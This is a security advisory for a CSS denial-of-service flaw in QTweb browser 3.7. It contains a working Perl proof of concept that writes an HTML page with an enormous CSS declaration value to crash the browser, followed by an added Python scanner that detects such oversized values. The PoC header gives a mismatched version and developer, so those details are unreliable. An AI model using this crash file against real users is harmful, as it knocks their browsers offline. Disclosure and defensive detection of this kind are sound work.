#########################################################
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Vendor URL: http://www.qtweb.net/
Advisory: http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html
Vendor notified: NO
Exploit available: YES
##########################################################
QTweb browser for Windows is vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
QTweb for windows 3.7(Build 063)
###########
Sample PoC
###########
Generate the crash file and open it with QTweb browser; it hangs and, after around one minute, crashes with an abnormal program termination.
#########################################################################
# Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
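use strict;
use warnings;

# Output file and the oversized value for the CSS declaration
my $file = "Crash_QTweb.html";
my $junk = "A/" x 20000016;

# Write an HTML page whose <style> block holds one declaration with that value
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
close($FILE);
print "\nCrash_QTweb.html File Created successfully\n";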
############################# EOF ############################
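A defensive check for the condition described above, added here as an example and not part of the original advisory: it streams an HTML file and flags any <style> declaration value longer than a limit, returning early so the scanner never buffers the oversized value. The function name and the 64 KiB limit are assumptions; the advisory gives no threshold.

```python
import io

MAX_VALUE_BYTES = 64 * 1024  # assumed policy limit; the advisory gives no threshold


def scan_css_values(stream, limit=MAX_VALUE_BYTES, chunk_size=1 << 16):
    """Stream HTML bytes; return (oversized, longest_value_len) for <style> blocks.

    Stops reading as soon as one declaration value exceeds `limit`, so memory
    and CPU stay bounded regardless of the file size.
    """
    TEXT, OPEN_TAG, CSS = range(3)
    state, in_value = TEXT, False
    tail = b""            # last bytes seen, lower-cased, to spot tags across chunks
    cur = longest = 0
    while chunk := stream.read(chunk_size):
        for byte in chunk.lower():
            tail = (tail + bytes((byte,)))[-7:]
            if state == TEXT:
                if tail.endswith(b"<style"):      # loose match, errs toward scanning
                    state = OPEN_TAG
            elif state == OPEN_TAG:
                if byte == ord(">"):
                    state, in_value = CSS, False
            elif tail == b"</style":
                state = TEXT
            elif in_value:
                if byte in b";{}":                # end of value (or it was a selector)
                    in_value = False
                else:
                    cur += 1
                    longest = max(longest, cur)
                    if cur > limit:
                        return True, longest
            elif byte == ord(":"):
                in_value, cur = True, 0
    return False, longest


if __name__ == "__main__":
    # Constructed samples: same page structure as the PoC, with a scaled-down value.
    page = b"<html><head><style type='text/css'>body {x: %s}</style></head></html>"
    print(scan_css_values(io.BytesIO(page % b"red")))
    print(scan_css_values(io.BytesIO(page % (b"A/" * 40000))))
```

Only <style> elements are inspected; inline style attributes and linked stylesheets would need the same limit applied separately.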
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....